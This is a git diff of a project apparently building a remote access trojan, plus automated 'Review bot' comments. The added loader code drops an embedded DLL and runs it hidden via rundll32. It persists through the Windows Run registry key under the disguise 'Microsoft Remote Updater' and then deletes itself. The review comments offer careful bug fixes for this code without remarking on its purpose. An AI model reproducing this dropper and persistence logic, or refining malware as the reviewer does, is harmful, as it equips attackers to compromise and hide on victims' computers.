diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
index 2be397b..18ce4a4 100644
Binary files a/Debug/FunDLL.iobj and b/Debug/FunDLL.iobj differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
index e9521e9..2099e96 100644
Binary files a/Debug/FunDLL.ipdb and b/Debug/FunDLL.ipdb differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
index 5cc9330..5df122a 100644
Binary files a/Debug/FunDLL.pdb and b/Debug/FunDLL.pdb differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
index 3afe78f..c69c382 100644
Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
index 7442067..693e8ed 100644
Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
index a7d3ee7..5e221a8 100644
--- a/Dll/Debug/Dll.log
+++ b/Dll/Debug/Dll.log
@@ -1,5 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
+ fundll.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
index b1f5512..4682923 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog
index cecb9a2..b4bb458 100644
Binary files a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ
diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb
index c1fb6af..6039950 100644
Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ
diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj
index 8574aaf..439f48f 100644
--- a/Dll/Dll.vcxproj
+++ b/Dll/Dll.vcxproj
@@ -31,7 +31,7 @@
DynamicLibrary
true
v141_xp
- Unicode
+ MultiByte
true
diff --git a/Dll/fundll.cpp b/Dll/fundll.cpp
index 5882e98..2eab02b 100644
--- a/Dll/fundll.cpp
+++ b/Dll/fundll.cpp
@@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
break;
case DLL_PROCESS_DETACH:
-
+
break;
default:
-
+
break;
}
+ return 1;
}
extern "C" __declspec(dllexport) int FunEntry() {
- return MessageBoxA(0, "Hello from C2", 0, 0);
+ char exe[MAX_PATH + 1];
+ GetModuleFileNameA(0, exe, sizeof(exe));
+ MessageBoxA(0, exe, "I am inside: ", 0);
+ return 0;
}
\ No newline at end of file
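Review bot: The `GetModuleFileNameA` result on line 67 of fundll.cpp is discarded, so a failed or truncated lookup still hands `exe` to `MessageBoxA`; with the v141_xp toolset this project builds with, a truncated result is not guaranteed to be NUL-terminated, so the call should be `DWORD len = GetModuleFileNameA(NULL, exe, sizeof(exe)); if (len == 0 || len >= sizeof(exe)) return 0;` before the message box. In `DllMain`, whose signature and first cases lie outside this hunk, the added `return 1;` is conventionally written `return TRUE;` since the function's declared return type is `BOOL`. A one-line comment on `FunEntry`, such as `// Exported entry used by rundll32; shows the host process path.`, would document the export's contract for the Loader project that names it.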
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
index b2ac90c..5de5b6b 100644
Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/Injector.log b/Injector/Debug/Injector.log
index 198e2b0..d66fb90 100644
--- a/Injector/Debug/Injector.log
+++ b/Injector/Debug/Injector.log
@@ -1,2 +1,2 @@
- LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
+ injector.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog
index 4a6fd2d..4073d96 100644
Binary files a/Injector/Debug/Injector.tlog/link.read.1.tlog and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ
diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb
index a02dcd8..71e54e2 100644
Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ
diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb
index bc03652..c2807b3 100644
Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ
diff --git a/Loader/Debug/Loader.log b/Loader/Debug/Loader.log
index edac3ef..d7e0545 100644
--- a/Loader/Debug/Loader.log
+++ b/Loader/Debug/Loader.log
@@ -1,2 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
+cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
+ loader.cpp
+ tools.cpp
+ Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
diff --git a/Loader/Debug/Loader.tlog/link.command.1.tlog b/Loader/Debug/Loader.tlog/link.command.1.tlog
index 1aeeb1c..b536724 100644
Binary files a/Loader/Debug/Loader.tlog/link.command.1.tlog and b/Loader/Debug/Loader.tlog/link.command.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
index 62b1f8e..f03f114 100644
Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
index 8f184aa..02fe3bb 100644
Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ
diff --git a/Loader/Loader.vcxproj b/Loader/Loader.vcxproj
index 0e0d345..6c22cec 100644
--- a/Loader/Loader.vcxproj
+++ b/Loader/Loader.vcxproj
@@ -96,7 +96,7 @@
Windows
true
- kernel32.lib;user32.lib
+ kernel32.lib;user32.lib;advapi32.lib
diff --git a/Loader/loader.cpp b/Loader/loader.cpp
index 35af249..ea2b25e 100644
--- a/Loader/loader.cpp
+++ b/Loader/loader.cpp
@@ -4,7 +4,7 @@
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) {
- // extract payload from section move to %appdata% with random name
+ // extract payload from section
DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
}
+ CloseHandle(new_file);
+ }
+ LocalFree(dll_memory);
+
+ // runs the dll after extraction
+ WCHAR win_path[MAX_PATH];
+ if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
+ if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
+ lstrcatW(win_path, appdata_path);
+ lstrcatW(win_path, L",");
+ lstrcatW(win_path, L"FunEntry");
+
+ STARTUPINFO startup_inf{ 0 };
+ PROCESS_INFORMATION process_information{ 0 };
+ startup_inf.cb = sizeof(startup_inf);
+
+ BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
+
+ if (b) {
+ HKEY reg_key;
+ LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, ®_key);
+ if (bb == ERROR_SUCCESS) {
+ RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
+ RegCloseKey(reg_key);
+ }
+ //WaitForSingleObject(process_information.hProcess, INFINITE);
+ //CloseHandle(process_information.hProcess);
+ }
+ }
+ }
+ }
+
+ // delete loader
+ WCHAR del_cmd[MAX_PATH];
+ if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
+ if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
+ WCHAR app_name[MAX_PATH];
+ GetModuleFileNameW(0, app_name, MAX_PATH);
+ lstrcatW(del_cmd, L"/c del \"");
+ lstrcatW(del_cmd, app_name);
+ lstrcatW(del_cmd, L"\"");
+
+ STARTUPINFO sii{ 0 };
+ PROCESS_INFORMATION pii{ 0 };
+ sii.cb = sizeof(sii);
+
+ CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
+ return 0;
}
}
}
\ No newline at end of file
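Review bot: `CloseHandle(new_file)` on the added line 137 runs even when the `CreateFile` result is `INVALID_HANDLE_VALUE`, because only the `WriteFile` on line 135 is guarded; move the `CloseHandle` inside the `if (new_file != INVALID_HANDLE_VALUE)` block. The `PROCESS_INFORMATION` filled by both `CreateProcessW` calls (lines 153 and 183) is never released, since lines 162-163 are commented out and closing `hProcess`/`hThread` does not require waiting on the process, so `CloseHandle(process_information.hThread); CloseHandle(process_information.hProcess);` belongs right after the `if (b)` check, and the same for `pii`, whose `CreateProcessW` result is not checked at all before `return 0`. On line 159 `sizeof(win_path)` passes `RegSetValueEx` the whole `MAX_PATH`-element buffer rather than the string's length, so whatever stack bytes follow the terminator are stored as well; `(lstrlenW(win_path) + 1) * sizeof(WCHAR)` is the size that matches `REG_SZ`. `WinMain` starts before this hunk, and a short comment above line 142 stating that `appdata_path` (declared outside the hunk) is expected to already hold the written file's full path would make the string assembly readable without the earlier context.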